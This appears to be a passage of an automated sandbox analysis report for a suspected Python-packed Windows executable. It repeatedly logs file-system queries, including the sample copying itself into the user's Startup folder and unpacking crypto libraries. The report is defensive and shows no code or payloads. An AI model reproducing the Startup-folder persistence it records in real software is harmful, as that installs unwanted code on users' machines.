Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\_sqlite3.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\_hashlib.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\_uuid.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\PublicKey VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Util VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\certifi VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\_bz2.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\_lzma.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
